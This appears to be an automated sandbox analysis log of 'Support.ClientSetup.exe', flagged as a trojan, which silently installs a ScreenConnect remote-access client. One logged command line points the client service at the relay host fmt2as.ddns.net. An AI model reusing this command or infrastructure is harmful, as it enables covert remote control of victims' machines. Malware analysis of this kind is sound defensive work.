                                  Source: Support.ClientSetup.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exeBinary or memory string: OriginalFilenamezlib.dll2 vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exeBinary or memory string: OriginalFilenamewixca.dll\ vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.2.Support.ClientSetup.exe.5cc0000.2.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.2.Support.ClientSetup.exe.5d50000.3.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.0.Support.ClientSetup.exe.c463d4.4.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: 0.2.Support.ClientSetup.exe.5d50000.3.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.2.Support.ClientSetup.exe.5d50000.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.2.Support.ClientSetup.exe.5d50000.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: classification engineClassification label: mal50.troj.evad.winEXE@26/58@1/2
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2268:120:WilError_03
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                                  Source: Support.ClientSetup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: Support.ClientSetup.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7753.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_3897296 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                  Source: Support.ClientSetup.exeReversingLabs: Detection: 22%
                                  Source: Support.ClientSetup.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                                  Source: Support.ClientSetup.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeFile read: C:\Users\user\Desktop\Support.ClientSetup.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\Support.ClientSetup.exe "C:\Users\user\Desktop\Support.ClientSetup.exe"
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a9232c38f7080cfd\ScreenConnect.ClientSetup.msi"
                                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5BDEFC20929AF4DEE946C247B81361C3 C
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7753.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_3897296 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C21885174D7F3F417F2722ACC2A29DD7
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C5E78E314317E5DB1425C419FD0D614F E Global\MSI0000
                                  Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fmt2as.ddns.net&p=8041&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40&k=BgIAAACkAABSU0ExAAgAAAEAAQBxzLpqh5koCP8CJbkkTCK5cqKcoz1K1JPBKGOoX2UntNEa0kbsjdHiHm6awC3b94Odgxip4bb3WZtV%2bJZdrEVSNJWv79YSvcWZT5y1UoPQ5ERCoZiQ9tchHj%2fdfQKGhg%2fdKH8J%2bRVDSV1rscnVOsc6DRlnVqJ%2bN3R4mz%2fwWIr4LXHocknsHhcSdO6lbQtdrPsiR%2fwv9GaUXfgI2d%2bsP4RrrBfAKpm2cyrPiMcHkEa3AHKqY3OM2oXN5%2bJcDFS6u9VisBMF5vwQJoGDG1GYkn2BCkN6fQQkj8QoHa84KuId00fcEP90jRiW7auJprFFF09vlWeqobl%2bXErI6rnKx3nZ&c=Online&c=Online&c=Online&c=&c=&c=&c=&c="
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe" "RunRole" "24be1ff4-4556-4f6e-bdeb-6bf05204e79c" "User"
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe" "RunRole" "3473749a-8727-4cb2-bb44-83e8e8d9f56c" "System"
                                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                                  Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a9232c38f7080cfd\ScreenConnect.ClientSetup.msi"Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5BDEFC20929AF4DEE946C247B81361C3 CJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C21885174D7F3F417F2722ACC2A29DD7Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C5E78E314317E5DB1425C419FD0D614F E Global\MSI0000Jump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7753.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_3897296 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe" "RunRole" "24be1ff4-4556-4f6e-bdeb-6bf05204e79c" "User"Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe" "RunRole" "3473749a-8727-4cb2-bb44-83e8e8d9f56c" "System"Jump to behavior
                                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
